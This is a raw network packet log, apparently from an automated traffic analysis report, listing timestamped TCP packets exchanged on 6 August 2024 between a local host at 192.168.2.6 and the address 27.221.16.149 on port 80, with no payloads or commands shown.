                                                                                                                                    Aug 6, 2024 10:30:28.134898901 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.134898901 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.134941101 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134975910 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135006905 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135018110 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135042906 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135071039 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135076046 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135111094 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135143042 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135160923 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135195017 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135224104 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135226965 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135263920 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135288954 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135356903 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135459900 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135468960 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135502100 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135535002 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135550976 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135567904 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135600090 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135708094 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135709047 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135762930 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135796070 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135829926 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135863066 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135895014 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135907888 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135907888 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135927916 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135961056 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.135979891 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.135994911 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.136044025 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.136307955 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.136430025 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.136629105 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451359034 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451400995 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451416016 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451442003 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451457024 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451471090 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451486111 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451499939 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451505899 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451505899 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451514959 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451530933 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451530933 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451545954 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451550007 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451569080 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451580048 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451586008 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451600075 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451615095 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451632023 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451637983 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451647997 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451653004 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451662064 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451687098 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451697111 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451703072 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451720953 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451778889 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.451961994 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451977015 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.451991081 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452006102 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452020884 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452035904 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452044010 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.452044010 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.452058077 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452073097 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452088118 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452092886 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.452101946 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452117920 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452131033 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452146053 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452153921 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.452153921 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.452159882 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452174902 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452191114 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452191114 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.452238083 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.452238083 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.452713013 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452738047 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452753067 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452804089 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.452843904 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452858925 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452872992 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452888012 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.452903032 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.452930927 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.505275965 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.747400999 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747437954 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747462988 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747478962 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747494936 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747517109 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747531891 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747546911 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747574091 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.747598886 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747612953 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.747612953 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.747615099 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747629881 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747646093 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747674942 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.747703075 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.747942924 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747957945 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.747973919 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748008966 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748023033 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748038054 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748049021 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.748049021 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.748054981 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748127937 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.748132944 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748148918 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748220921 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.748488903 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748503923 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748519897 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748584986 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.748584986 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.748616934 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748631954 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748646021 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748660088 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748693943 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.748708963 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748723984 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748724937 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.748739958 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748752117 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.748799086 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.748799086 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.749073029 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749098063 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749113083 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749152899 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749166965 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749181986 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749201059 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749201059 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.749201059 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.749216080 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749231100 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749231100 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.749280930 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.749331951 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749346018 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749360085 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749373913 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749387980 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749397993 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.749402046 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749416113 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.749438047 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.749551058 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.749996901 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.750010967 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.750133038 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.090681076 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090703964 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090728045 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090743065 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090758085 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090771914 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090781927 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.090786934 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090809107 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090822935 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090837955 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090862036 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090876102 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090888023 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.090888023 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.090888023 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.090890884 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090939999 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090955019 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090967894 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.090982914 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091026068 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.091027021 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.091027021 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.091398001 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091414928 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091429949 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091461897 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.091474056 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091487885 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091500998 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091515064 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091557980 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.091557980 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.091557980 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.091578960 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091593027 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091607094 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091620922 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091634989 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091648102 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.091655970 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.091655970 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.091852903 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.092114925 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092128992 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092149973 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092164040 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092179060 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092231989 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.092232943 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.092715025 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092736006 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092751026 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092766047 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092778921 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092789888 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.092789888 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.092793941 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092833042 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.092854023 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092868090 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092881918 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092889071 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092912912 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092921019 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.092930079 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.092971087 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.092971087 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.092988968 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.093003988 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.093018055 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.093034029 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.093276024 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.093291044 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.093291044 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.093486071 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.179085970 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.223895073 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.432761908 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.432797909 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.432813883 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.432827950 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.432842016 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.432857037 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.432858944 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.432872057 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.432888985 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.432913065 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.432931900 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.432960033 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433090925 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433116913 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433130980 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433131933 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.433145046 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433171034 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.433193922 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433208942 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433233976 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.433284044 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433299065 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433317900 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433321953 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.433341026 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433356047 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433361053 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.433371067 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433387041 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433393955 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.433412075 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433423042 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.433425903 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433464050 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433465958 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.433478117 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433491945 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433506966 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433525085 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.433542013 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433542013 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.433557034 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433571100 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.433628082 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.434247971 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434293985 CEST804977927.221.16.149192.168.2.6
